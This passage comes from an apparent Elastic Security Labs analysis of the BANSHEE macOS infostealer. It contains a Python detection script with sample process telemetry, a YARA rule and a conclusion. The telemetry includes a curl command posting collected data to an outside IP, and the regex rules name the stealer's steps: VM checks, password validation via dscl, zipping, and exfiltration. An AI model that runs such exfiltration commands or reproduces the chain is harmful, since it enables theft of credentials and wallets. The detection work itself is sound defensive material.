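    "2024-08-13T10:00:09Z pid=506 ppid=400 cmd=ditto -c -k /tmp/collect /tmp/collect.zip",
    "2024-08-13T10:00:10Z pid=507 ppid=400 cmd=curl -X POST -d @/tmp/payload.b64 https://45.142.122[.]92/send/",
    "2024-08-13T10:05:00Z pid=600 ppid=1 cmd=osascript -e 'display notification \"done\"'",
]

# One rule per observable step of the chain described in the analysis above.
RULES = {
    "vm_check": re.compile(r"system_profiler\s+SPHardwareDataType.*Model Identifier"),
    "applescript_tempfile": re.compile(r"osascript\s+/tmp/tempAppleScript\b"),
    "dscl_authonly": re.compile(r"\bdscl\s+\S*Local/Default\s+-authonly\b"),
    "sysinfo_dump": re.compile(r"system_profiler\s+SPSoftwareDataType\s+SPHardwareDataType"),
    "public_ip_lookup": re.compile(r"\bcurl\b.*freeipapi\.com"),
    "ditto_zip": re.compile(r"\bditto\s+-c\s+-k\b"),
    "curl_post_send": re.compile(r"\bcurl\b.*(?:-X\s*POST|-d\b|--data\b).*/send/"),
}

EVENT_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) cmd=(?P<cmd>.*)$")


def parse_event(line):
    """Return a dict with ts, pid, ppid and cmd, or None for a malformed line."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["pid"], ev["ppid"] = int(ev["pid"]), int(ev["ppid"])
    return ev


def detect(lines, threshold=3):
    """Map each parent PID to the sorted rule names it tripped, keeping only
    parents that tripped at least `threshold` distinct steps of the chain."""
    hits = {}
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        for name, rx in RULES.items():
            if rx.search(ev["cmd"]):
                hits.setdefault(ev["ppid"], set()).add(name)
    return {ppid: sorted(names) for ppid, names in hits.items() if len(names) >= threshold}
```

Note that the dscl -authonly line carries the phished password on the command line, so process telemetry that captures arguments will record it; treat such events as sensitive when forwarding them.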

YARA rule

Elastic Security has created YARA rules to identify this activity; the rule below identifies the BANSHEE malware:

rule Macos_Infostealer_Banshee {
    meta:
        author = "Elastic Security"
        creation_date = "2024-08-13"
        last_modified = "2024-08-13"
        os = "MacOS"
        arch = "x86, arm64"
        category_type = "Infostealer"
        family = "Banshee"
        threat_name = "Macos.Infostealer.Banshee"
        license = "Elastic License v2"
    strings:
        $str_0 = "No debugging, VM, or Russian language detected." ascii fullword
        $str_1 = "Remote IP: " ascii fullword
        $str_2 = "Russian language detected!" ascii fullword
        $str_3 = " is empty or does not exist, skipping." ascii fullword
        $str_4 = "Data posted successfully" ascii fullword
        $binary_0 = { 8B 55 BC 0F BE 08 31 D1 88 08 48 8B 45 D8 48 83 C0 01 48 89 45 D8 E9 }
        $binary_1 = { 48 83 EC 60 48 89 7D C8 48 89 F8 48 89 45 D0 48 89 7D F8 48 89 75 F0 48 89 55 E8 C6 45 E7 00 }
    condition:
        all of ($str_*) or all of ($binary_*)
}

Conclusion 

BANSHEE Stealer is macOS-based malware that can collect extensive data from the system, browsers, cryptocurrency wallets, and numerous browser extensions. Despite its potentially dangerous capabilities, the malware's lack of sophisticated obfuscation and the presence of debug information make it easier for analysts to dissect and understand. While BANSHEE Stealer is not overly complex in its design, its focus on macOS systems and the breadth of data it collects make it a significant threat that demands attention from the cybersecurity community.

]]>
stan.beer@itwire.com (Elastic Security Labs) Security Fri, 23 Aug 2024 21:10:57 +1000